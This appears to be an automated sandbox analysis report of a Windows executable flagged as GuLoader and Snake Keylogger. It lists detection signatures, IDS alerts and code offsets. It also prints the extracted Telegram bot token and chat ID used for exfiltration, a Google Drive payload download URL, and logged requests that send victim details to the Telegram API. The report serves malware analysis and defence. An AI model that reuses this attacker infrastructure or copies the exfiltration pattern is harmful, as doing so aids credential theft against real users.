Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rFa24c148.exe

Overview

General Information

Sample name:rFa24c148.exe
Analysis ID:1543495
MD5:7644ebbf786053ffaf95dbe86b7de5d4
SHA1:5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256:0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • rFa24c148.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\rFa24c148.exe" MD5: 7644EBBF786053FFAF95DBE86B7DE5D4)
    • rFa24c148.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\rFa24c148.exe" MD5: 7644EBBF786053FFAF95DBE86B7DE5D4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2061274960.00000000052E5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: rFa24c148.exe PID: 7732JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: rFa24c148.exe PID: 7732JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T02:02:50.234028+010028033053Unknown Traffic192.168.2.449740188.114.96.3443TCP
            2024-10-28T02:02:53.524437+010028033053Unknown Traffic192.168.2.449744188.114.96.3443TCP
            2024-10-28T02:02:55.203844+010028033053Unknown Traffic192.168.2.449746188.114.96.3443TCP
            2024-10-28T02:03:00.071669+010028033053Unknown Traffic192.168.2.449769188.114.96.3443TCP
            2024-10-28T02:03:01.696824+010028033053Unknown Traffic192.168.2.449781188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T02:02:48.017603+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-10-28T02:02:49.517616+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-10-28T02:02:51.174212+010028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP
            2024-10-28T02:02:52.814456+010028032742Potentially Bad Traffic192.168.2.449743193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T02:02:41.620398+010028032702Potentially Bad Traffic192.168.2.449736172.217.18.110443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
            Source: rFa24c148.exeReversingLabs: Detection: 15%
            Source: rFa24c148.exeVirustotal: Detection: 31%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367487A8 CryptUnprotectData,4_2_367487A8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36748EF1 CryptUnprotectData,4_2_36748EF1
            Source: rFa24c148.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49787 version: TLS 1.2
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055FF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004060BA FindFirstFileW,FindClose,0_2_004060BA
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004055FF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004060BA FindFirstFileW,FindClose,4_2_004060BA
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F2C0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F4AC
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 0016FC19h4_2_0016F974
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36552C19h4_2_36552968
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 365531E0h4_2_36552DC8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655E501h4_2_3655E258
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655E0A9h4_2_3655DE00
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655E959h4_2_3655E6B0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655F209h4_2_3655EF60
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655EDB1h4_2_3655EB08
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36550D0Dh4_2_36550B30
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36551697h4_2_36550B30
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655F661h4_2_3655F3B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_36550040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655FAB9h4_2_3655F810
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655D3A1h4_2_3655D0F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655CF49h4_2_3655CCA0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655D7F9h4_2_3655D550
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 365531E0h4_2_3655310E
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3655DC51h4_2_3655D9A8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36747119h4_2_36746E70
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36747EB5h4_2_36747B78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36749280h4_2_36748FB0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36744D21h4_2_36744A78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674D146h4_2_3674CE78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36743709h4_2_36743460
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674F136h4_2_3674EE68
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36741CF9h4_2_36741A50
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367402E9h4_2_36740040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367462D9h4_2_36746030
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674BF06h4_2_3674BC38
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367448C9h4_2_36744620
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674DEF6h4_2_3674DC28
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36746CC1h4_2_36746A18
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367432B1h4_2_36743008
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36740B99h4_2_367408F0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674F5C6h4_2_3674F2F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36745179h4_2_36744ED0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36747571h4_2_367472C8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674C396h4_2_3674C0C8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674E386h4_2_3674E0B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36742151h4_2_36741EA8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36740741h4_2_36740498
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then mov esp, ebp4_2_3674B081
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36746733h4_2_36746488
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36742A01h4_2_36742758
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674C826h4_2_3674C558
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36740FF1h4_2_36740D48
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674E816h4_2_3674E548
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367479C9h4_2_36747720
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367455D1h4_2_36745328
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674B5E6h4_2_3674B318
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367425A9h4_2_36742300
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674D5D6h4_2_3674D308
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367418A1h4_2_367415F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674CCB6h4_2_3674C9E8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674ECA6h4_2_3674E9D8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36745E81h4_2_36745BD8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then mov esp, ebp4_2_3674B1C0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36742E59h4_2_36742BB0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36741449h4_2_367411A0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674BA76h4_2_3674B7A8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674DA66h4_2_3674D798
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 36745A29h4_2_36745780
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 3674FA56h4_2_3674F788
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B6970h4_2_367B6678
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B42B6h4_2_367B3FE8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B4746h4_2_367B4478
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BD768h4_2_367BD470
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BAC60h4_2_367BA968
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B0C2Eh4_2_367B0960
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B8158h4_2_367B7E60
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B3E26h4_2_367B3B58
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BEF50h4_2_367BEC58
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BC448h4_2_367BC150
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B5E16h4_2_367B5B48
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B9940h4_2_367B9648
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B030Eh4_2_367B0040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B6E38h4_2_367B6B40
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B3506h4_2_367B3238
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BDC30h4_2_367BD938
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BB128h4_2_367BAE30
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B54F6h4_2_367B5228
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B8620h4_2_367B8328
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BF418h4_2_367BF120
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B2BE6h4_2_367B2918
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BC910h4_2_367BC618
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B19DEh4_2_367B1710
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B9E08h4_2_367B9B10
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B4BD7h4_2_367B4908
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B7300h4_2_367B7008
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BE0F8h4_2_367BDE00
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B22C6h4_2_367B1FF8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BB5F0h4_2_367BB2F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B10BEh4_2_367B0DF0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B8AE8h4_2_367B87F0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BF8E0h4_2_367BF5E8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BCDD8h4_2_367BCAE0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B6347h4_2_367B5FD8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BA2D0h4_2_367B9FD8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B079Eh4_2_367B04D0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B77C8h4_2_367B74D0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BE5C0h4_2_367BE2C8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BBAB8h4_2_367BB7C0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B5986h4_2_367B56B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B8FB0h4_2_367B8CB8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BFDA8h4_2_367BFAB0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B3076h4_2_367B2DA8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BD2A0h4_2_367BCFA8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B1E47h4_2_367B1BA0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BA798h4_2_367BA4A0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B5066h4_2_367B4D98
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B7C90h4_2_367B7998
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BEA88h4_2_367BE790
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B2756h4_2_367B2488
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367BBF80h4_2_367BBC88
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B154Eh4_2_367B1280
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367B9478h4_2_367B9180
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F1FE8h4_2_367F1CF0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F0338h4_2_367F0040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F1B20h4_2_367F1828
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F1190h4_2_367F0E98
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F1658h4_2_367F1360
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F0801h4_2_367F0508
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then jmp 367F0CC8h4_2_367F09D0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36833E70
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36833E60
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36830A10
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_368308DE
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36830960

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.18.110:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
